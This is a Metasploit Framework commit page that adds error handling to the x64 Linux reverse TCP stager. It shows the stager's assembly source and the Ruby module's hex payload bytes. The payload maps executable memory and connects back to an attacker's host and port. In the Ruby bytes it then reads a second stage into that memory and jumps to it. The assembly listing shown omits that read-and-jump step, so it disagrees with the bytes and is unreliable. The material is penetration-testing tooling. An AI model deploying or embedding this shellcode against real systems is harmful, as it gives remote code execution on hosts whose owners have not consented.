github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

Land #8607, add error handling to x64 Linux stagers

Browse Source
This commit is contained in:
Brent Cook 2017-06-27 03:53:07 -05:00
commit cb82bdc6a9
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 96 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

75
external/source/shellcode/linux/x64/stager_sock_reverse.s vendored Normal file
View File

@ -0,0 +1,75 @@
##
#
# Name: stager_sock_reverse
# Qualities: -
# Authors: nemo <nemo [at] felinemenace.org>, tkmru
# License: MSF_LICENSE
# Description:
#
# Implementation of a Linux reverse TCP stager for x64 architecture.
#
# Assemble with: gcc -nostdlib stager_sock_reverse.s -o stager_sock_reverse
#
# Meta-Information:
#
# meta-shortname=Linux Reverse TCP Stager
# meta-description=Connect back to the framework and run a second stage
# meta-authors=ricky, tkmru
# meta-os=linux
# meta-arch=x64
# meta-category=stager
# meta-connection-type=reverse
# meta-name=reverse_tcp
##
.text
.globl _start
_start:
xor %rdi,%rdi
pushq $0x9
pop %rax
cltd
mov $0x10,%dh
mov %rdx,%rsi
xor %r9,%r9
pushq $0x22
pop %r10
mov $0x7,%dl
syscall
test %rax, %rax
js failed
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
push %rsi
push %rax
pushq $0x29
pop %rax
cltd
pushq $0x2
pop %rdi
pushq $0x1
pop %rsi
syscall
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test %rax, %rax
js failed
xchg %rax,%rdi
movabs $0x100007fb3150002,%rcx
push %rcx
mov %rsp,%rsi
pushq $0x10
pop %rdx
pushq $0x2a
pop %rax
syscall
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
test %rax, %rax
js failed
pop %rcx
failed:
pushq $0x3c
pop %rax
pushq $0x1
pop %rdi
syscall
# exit(1)

26
modules/payloads/stagers/linux/x64/reverse_tcp.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
module MetasploitModule
CachedSize = 68
CachedSize = 96
include Msf::Payload::Stager
include Msf::Payload::Linux
@ -17,7 +17,7 @@ module MetasploitModule
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => 'ricky',
'Author' => ['ricky', 'tkmru'],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
@ -26,10 +26,11 @@ module MetasploitModule
{
'Offsets' =>
{
'LHOST' => [ 45, 'ADDR' ],
'LPORT' => [ 43, 'n' ],
'LHOST' => [ 55, 'ADDR' ],
'LPORT' => [ 53, 'n' ],
},
'Payload' =>
# Generated from external/source/shellcode/linux/x64/stager_sock_reverse.s
"\x48\x31\xff" + # xor %rdi,%rdi
"\x6a\x09" + # pushq $0x9
"\x58" + # pop %rax
@ -42,6 +43,8 @@ module MetasploitModule
"\xb2\x07" + # mov $0x7,%dl
"\x0f\x05" + # syscall
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
"\x48\x85\xc0" + # test %rax,%rax
"\x78\x3c" + # js 40012c <failed>
"\x56" + # push %rsi
"\x50" + # push %rax
"\x6a\x29" + # pushq $0x29
@ -53,6 +56,8 @@ module MetasploitModule
"\x5e" + # pop %rsi
"\x0f\x05" + # syscall
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
"\x48\x85\xc0" + # test %rax,%rax
"\x78\x29" + # js 40012c <failed>
"\x48\x97" + # xchg %rax,%rdi
"\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx
"\x15\xb3" + # LPORT
@ -65,12 +70,23 @@ module MetasploitModule
"\x58" + # pop %rax
"\x0f\x05" + # syscall
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
"\x48\x85\xc0" + # test %rax,%rax
"\x78\x0c" + # js 40012c <failed>
"\x59" + # pop %rcx
"\x5e" + # pop %rsi
"\x5a" + # pop %rdx
"\x0f\x05" + # syscall
# read(3, "", 4096)
"\xff\xe6" # jmpq *%rsi
"\x48\x85\xc0" + # test %rax,%rax
"\x78\x02" + # js 40012c <failed>
"\xff\xe6" + # jmpq *%rsi
# 40012c <failed>:
"\x6a\x3c" + # pushq $0x3c
"\x58" + # pop %rax
"\x6a\x01" + # pushq $0x1
"\x5f" + # pop %rdi
"\x0f\x05" #syscall
# exit(1)
}
))
end